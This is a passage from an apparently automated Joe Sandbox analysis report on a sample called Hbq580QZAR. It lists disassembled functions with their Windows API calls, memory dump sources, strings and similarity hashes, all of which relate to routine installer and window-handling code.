                                                                                            • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                            • API String ID: 1646373207-834958232
                                                                                            • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                            • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                                                            • Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                            • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                                                            APIs
                                                                                              • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                              • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                            • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                            • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                            • API String ID: 2238633743-2683653824
                                                                                            • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                            • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                                                            • Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                            • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                                                            APIs
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                                                            • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileNext
                                                                                            • String ID:
                                                                                            • API String ID: 2066263336-0
                                                                                            • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                            • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                                                            • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                            • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
                                                                                            APIs
                                                                                              • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                                              • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                                                            • GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountErrorFileLastMoveTick
                                                                                            • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                            • API String ID: 2406187244-2685451598
                                                                                            • Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                            • Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
                                                                                            • Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                            • Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
                                                                                            APIs
                                                                                            • GetDesktopWindow.USER32 ref: 00413D46
                                                                                            • GetDesktopWindow.USER32 ref: 00413DFE
                                                                                              • Part of subcall function 00418EC0: 6FAEC6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                                              • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                                                            • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CursorDesktopWindow$Show
                                                                                            • String ID:
                                                                                            • API String ID: 2074268717-0
                                                                                            • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                            • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                                                            • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                            • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
                                                                                            • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
                                                                                            • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
                                                                                            • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: LoadString$FileMessageModuleName
                                                                                            • String ID:
                                                                                            • API String ID: 704749118-0
                                                                                            • Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                            • Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
                                                                                            • Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                            • Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                                              • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                                                            • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                                              • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                                                            • IsRectEmpty.USER32(?), ref: 0044E953
                                                                                            • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                            • String ID:
                                                                                            • API String ID: 855768636-0
                                                                                            • Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                            • Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
                                                                                            • Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                            • Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
                                                                                            APIs
                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 00495988
                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 004959A3
                                                                                            • OffsetRect.USER32(?,?,00000000), ref: 004959BD
                                                                                            • OffsetRect.USER32(?,00000000,?), ref: 004959D8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: OffsetRect
                                                                                            • String ID:
                                                                                            • API String ID: 177026234-0
                                                                                            • Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                            • Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
                                                                                            • Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                            • Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
                                                                                            APIs
                                                                                            • GetCursorPos.USER32 ref: 00417260
                                                                                            • SetCursor.USER32(00000000), ref: 004172A3
                                                                                            • GetLastActivePopup.USER32(?), ref: 004172CD
                                                                                            • GetForegroundWindow.USER32(?), ref: 004172D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1959210111-0
                                                                                            • Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                            • Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
                                                                                            • Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                            • Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
                                                                                            APIs
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00495605
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00495619
                                                                                            • MulDiv.KERNEL32(?,00000008,?), ref: 00495637
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                            • Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
                                                                                            • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                            • Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
                                                                                            APIs
                                                                                            • GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
                                                                                            • UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
                                                                                            • RegisterClassA.USER32(00499598), ref: 0041F4D4
                                                                                            • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                            • String ID:
                                                                                            • API String ID: 4025006896-0
                                                                                            • Opcode ID: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                                                            • Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
                                                                                            • Opcode Fuzzy Hash: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                                                            • Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
                                                                                            APIs
                                                                                            • WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                            • CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                            • String ID:
                                                                                            • API String ID: 4071923889-0
                                                                                            • Opcode ID: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                            • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                                                            • Opcode Fuzzy Hash: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                            • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                                                            • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
                                                                                            • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
                                                                                            • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3473537107-0
                                                                                            • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                            • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                                                            • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                            • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 004705F1
                                                                                            Strings
                                                                                            • Failed to set NTFS compression state (%d)., xrefs: 00470602
                                                                                            • Unsetting NTFS compression on file: %s, xrefs: 004705D7
                                                                                            • Setting NTFS compression on file: %s, xrefs: 004705BF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                            • API String ID: 1452528299-3038984924
                                                                                            • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                            • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                                                            • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                            • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                                                            Strings
                                                                                            • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                                                            • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                                                            • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
